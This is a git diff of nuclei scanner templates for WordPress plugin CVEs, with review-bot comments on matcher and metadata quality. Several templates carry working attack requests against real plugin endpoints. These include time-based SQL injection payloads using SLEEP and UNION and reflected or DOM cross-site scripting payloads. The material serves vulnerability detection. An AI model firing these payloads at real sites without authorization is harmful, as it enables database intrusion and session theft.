mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 - https://wordpress.org/plugins/asgaros-forum/ 
@@ -16,11 +20,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 + epss-score: 0.11843 + epss-percentile: 0.94798 + cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli + verified: true + max-request: 1 + vendor: asgaros + product: asgaros_forum + framework: wordpress + tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros -requests: +http: - raw: - | @timeout: 15s @@ -35,5 +46,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502204abd65cd69b3643e17793039bcb1df79c03f29ed1e031e0ae09f57d30b48a2eb022100cb2c0863ead3cbed3b58da963a5fe5581155c01b4aebcc1a1bbfc5404a1a6a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24849.yaml b/nuclei-templates/CVE-2021/CVE-2021-24849.yaml index 02114d86a2..8709514ac1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24849.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24849.yaml 
@@ -1,43 +1,69 @@ id: CVE-2021-24849 info: - name: WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection - author: akincibor + name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection + author: ritikchaddha severity: critical - description: The wcfm_ajax_controller AJAX action of the plugin, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. + description: | + The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. + remediation: Fixed in 3.4.12 reference: - - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24849 + - https://wordpress.org/plugins/wc-multivendor-marketplace/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24849 + cwe-id: CWE-89 + epss-score: 0.02367 + epss-percentile: 0.89583 + cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: wclovers + product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" + framework: wordpress + publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli +flow: http(1) && http(2) -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wc-multivendor-marketplace/readme.txt' +http: + - raw: + - | + GET 
/wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1 + Host: {{Hostname}} - extractors: - - type: regex - name: version + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce") + condition: and internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + - raw: + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: status - status: - - 200 + {{post_data}} - - type: word - words: - - "WCFM Marketplace" - part: body + payloads: + post_data: + - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--" + - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`" + stop-at-first-match: true + matchers: - type: dsl dsl: - - compare_versions(version, '< 3.4.12') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains(body, "success")' + condition: and +# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24862.yaml b/nuclei-templates/CVE-2021/CVE-2021-24862.yaml index 1c708803dc..1f03c3cb18 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24862.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24862.yaml 
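Review bot: In the second request's matcher, `contains(body, "success")` adds almost nothing to the duration check, because an error response of the form `{"success":false}` (constructed example) contains the same substring; if the vulnerable endpoint returns a specific success payload, match that, e.g. `- 'contains(body, "\"success\":true")'`, after confirming the actual response shape. The rewritten `tags` line drops `unauth` even though the description still says the action is available to unauthenticated users, and the first request's `matchers` block is gated on the exact readme title string, so a renamed plugin header skips the whole flow silently — a comment noting that `internal: true` here controls `flow` would help maintainers.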
@@ -6,19 +6,22 @@ info: severity: high description: | WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator. + impact: | + An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 5.0.1.6. reference: - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615 - https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24862 - http://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html + - https://github.com/ezelnur6327/ezelnur6327 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.68026 - epss-percentile: 0.97645 + epss-score: 0.72686 + epss-percentile: 0.97816 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: wpscan,cve,wp-plugin,cve2021,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm + tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss http: - raw: 
@@ -51,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4b0a00483046022100cefde2325aafa29bdb96325ab1b6a3d8381e18bd82c8acbd73de5c108c0ee662022100af0361534a103a7d9a6e074d7f583353658fc7387f3beea4245e58dfcd1c16b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24875.yaml b/nuclei-templates/CVE-2021/CVE-2021-24875.yaml index 70a0b804a6..523b7e7fbc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24875.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24875.yaml @@ -6,17 +6,21 @@ info: severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 - https://nvd.nist.gov/vuln/detail/CVE-2021-24875 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50003 + epss-percentile: 0.50097 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -24,7 +28,7 @@ info: vendor: implecode product: ecommerce_product_catalog framework: wordpress - tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin + tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode http: - raw: @@ -45,4 +49,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and -# digest: 4a0a0047304502201595ed76f86df2b020d0c3114918533d6b49a8b1743f70f517a13785fb857e4d022100e1e737b9292818f90e14785202a3644ad7202ef89d53508d98017b39ec27bdef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24891.yaml b/nuclei-templates/CVE-2021/CVE-2021-24891.yaml index c312429522..660c2e8fab 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24891.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24891.yaml @@ -1,11 +1,10 @@ id: CVE-2021-24891 - info: - name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting + name: Elementor < 3.1.4 - DOM Cross-Site-Scripting author: dhiyaneshDk severity: medium description: | - WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + The Elementor Website Builder WordPress plugin before 3.1.4 does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue. reference: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d 
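Review bot: The CVE-2021-24891 hunk starting here (`@@ -1,11 +1,10 @@`) and its continuations on the next line move this template in the opposite direction from the rest of the commit: the name drops the `WordPress … <3.1.4` convention, the description reverts to the wpscan wording, the blank separators and the `# Enhanced by mp` trailer are removed, yet the template keeps `requests:` and `req-condition: true` and gains no `# digest:` line, while CVE-2021-24917, CVE-2021-24940 and CVE-2021-24943 in this same commit are migrated from `requests:` to `http:`. This looks like an older copy overwriting a newer one rather than an intentional edit; worth confirming which revision is meant to win before merging. If the newer form is intended, the block should at least switch to `http:` for consistency with its siblings.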
@@ -15,14 +14,12 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 - tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss - + tags: cve,cve2021,dom,xss,wordpress,wp-plugin,elementor requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9" - extractors: - type: regex name: version @@ -30,11 +27,9 @@ requests: regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" internal: true - - type: kval kval: - version - req-condition: true matchers-condition: and matchers: @@ -42,9 +37,6 @@ requests: part: body_1 regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" - - type: dsl dsl: - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24910.yaml b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml new file mode 100644 index 0000000000..bd2581d33d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2021-24910 +info: + name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: Screamy + severity: medium + reference: + - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt + - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,xss,wp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '{"result":' + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24915.yaml b/nuclei-templates/CVE-2021/CVE-2021-24915.yaml index 037d8f28c5..c52440bb78 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24915.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24915.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24915 cwe-id: CWE-89 - epss-score: 0.19154 - epss-percentile: 0.95753 + epss-score: 0.22351 + epss-percentile: 0.96057 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: contest_gallery product: contest_gallery framework: wordpress - public-query: "/wp-content/plugins/contest-gallery/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery + publicwww-query: "/wp-content/plugins/contest-gallery/" + tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: - raw: 
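Review bot: In the new CVE-2021-24910 template the first word matcher entry is the empty string (`- ''`), which `contains` satisfies for every body, so with `condition: and` the matcher effectively checks only `{"result":`, and the request path ends in `q=` with no value, so nothing reflected is ever asserted. The same empty entry (`- ""`) appears in the new CVE-2021-24926 template on a later line, whose second request carries only `domain=test.foo`, so that matcher only proves the Domain Check admin page renders after login and would match a patched install too. Both look like markup stripped somewhere between the on-disk template and this diff; please verify the committed files and, if the marker really is missing, restore it in both the request and the `words` list. CVE-2021-24910 also still uses `requests:` and lacks the classification/cpe block and `# digest:` line its siblings in this commit carry.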
@@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079507e924f48eab289803b7dfbeb9dbe0f3de89dde79fef4d9d8595cd75867a5022029bd1039c7f6496f93c779f281ae894c37277bfdd96fe3cef0b22e281d503159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24917.yaml b/nuclei-templates/CVE-2021/CVE-2021-24917.yaml index 8b1db86298..28a468b30b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24917.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24917.yaml 
@@ -1,25 +1,34 @@ id: CVE-2021-24917 info: - name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header + name: WordPress WPS Hide Login <1.9.1 - Information Disclosure author: akincibor severity: high - description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. + description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. + impact: | + An attacker can gain sensitive information about the WordPress site, such as the login page URL. + remediation: Fixed in version 1.9.1. reference: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917 - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 - remediation: Fixed in version 1.9.1 + - https://wordpress.org/support/topic/bypass-security-issue/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 + epss-score: 0.03563 + epss-percentile: 0.90675 + cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve + verified: true + max-request: 1 + vendor: wpserveur + product: wps_hide_login + framework: wordpress + tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur -requests: +http: - raw: - | GET /wp-admin/options.php HTTP/1.1 
@@ -28,16 +37,17 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - "!contains(tolower(location), 'wp-login.php')" + - type: word part: header words: - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1' - - type: dsl - dsl: - - "!contains(tolower(location), 'wp-login.php')" - extractors: - type: kval kval: - location +# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24926.yaml b/nuclei-templates/CVE-2021/CVE-2021-24926.yaml new file mode 100644 index 0000000000..8e4826b49b --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24926.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2021-24926 + +info: + name: WordPress Domain Check <1.0.17 - Cross-Site Scripting + author: cckuailong + severity: medium + description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. + remediation: | + Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24926 + cwe-id: CWE-79 + epss-score: 0.00171 + epss-percentile: 0.53153 + cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: domaincheckplugin + product: domain_check + framework: wordpress + tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Domain Check" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24931.yaml b/nuclei-templates/CVE-2021/CVE-2021-24931.yaml index 26dfe36884..83aacd167d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24931.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24931.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 - epss-score: 0.68247 - epss-percentile: 0.97652 + epss-score: 0.58114 + epss-percentile: 0.97428 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: wp-plugin,cve,wp,packetstorm,unauth,wpscan,cve2021,sqli,wordpress,secure-copy-content-protection + tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro http: - raw: 
@@ -43,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"status\":true")' condition: and -# digest: 4a0a00473045022100ba017264be79b97f29ff7ebfeece80ac33b11bba74f89627075255d8c765338602207ca91db7265e04c70ed36552a528c84516675774c8a4fb12aaa2ff71d8b0532a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24940.yaml b/nuclei-templates/CVE-2021/CVE-2021-24940.yaml index 6b0c52a02f..6eb73e7bd6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24940.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24940.yaml 
@@ -6,20 +6,31 @@ info: severity: medium description: | WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in 5.9.8. reference: - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f - https://nvd.nist.gov/vuln/detail/CVE-2021-24940 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24940 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42899 + cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,xss,authenticated,wpscan,cve,cve2021,wordpress,wp-plugin + verified: true + max-request: 2 + vendor: woocommerce + product: persian-woocommerce + framework: wordpress + tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
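Review bot: The new `cpe: cpe:2.3:a:woocommerce:persian-woocommerce:…` and `vendor: woocommerce` lines place the third-party Persian Woocommerce plugin under the WooCommerce vendor namespace; if that value was hand-assigned rather than taken from the NVD record for CVE-2021-24940, inventories keyed on vendor will mis-attribute findings. Please confirm it against the NVD CPE before publishing, and if NVD uses a different vendor string, align both `cpe` and `vendor` with it. The added `impact` text is the same boilerplate used for CVE-2021-24875 above, which is acceptable but could be tightened to the admin-dashboard context this description gives.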
@@ -27,20 +38,16 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - contains(all_headers_2, "text/html") + - contains(header_2, "text/html") - status_code_2 == 200 - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and - -# Enhanced by md on 2022/10/17 +# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24943.yaml b/nuclei-templates/CVE-2021/CVE-2021-24943.yaml index 7452908c5f..b85b13fc17 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24943.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24943.yaml 
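Review bot: Removing `cookie-reuse: true` and `req-condition: true` makes the second request depend on the engine carrying the login cookies from request 1 by default; nuclei v3 does this and infers multi-response conditions, but if this repository is still consumed by older v2 engines the authenticated step silently breaks and the `body_2` matchers can never fire. If v2 compatibility is not a goal, a one-line note in the commit message or a `min-version`-style comment would make that explicit. The `all_headers_2` to `header_2` rename is fine; both are valid DSL names.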
@@ -1,43 +1,50 @@ id: CVE-2021-24943 info: - name: Registrations for the Events Calendar < 2.7.6 - Unauthenticated SQL Injection - author: akincibor + name: Registrations for the Events Calendar < 2.7.6 - SQL Injection + author: ritikchaddha severity: critical - description: The plugin does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.. + description: | + The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection. + remediation: Fixed in 2.7.6 reference: - - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24943 + - https://wordpress.org/plugins/registrations-for-the-events-calendar/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24943 + cwe-id: CWE-89 + epss-score: 0.21158 + epss-percentile: 0.96299 + cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: roundupwp + product: registrations_for_the_events_calendar + framework: wordpress + publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar +variables: + text: "{{rand_base(5)}}" -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt' +http: + - raw: + - | + @timeout: 20s + POST 
/wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Event Registration Plugin" - part: body - - type: dsl dsl: - - compare_versions(version, '< 2.7.6') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "Please enter the email you registered with")' + condition: and +# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24946.yaml b/nuclei-templates/CVE-2021/CVE-2021-24946.yaml index f02a7cddfe..77765a0524 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24946.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24946.yaml 
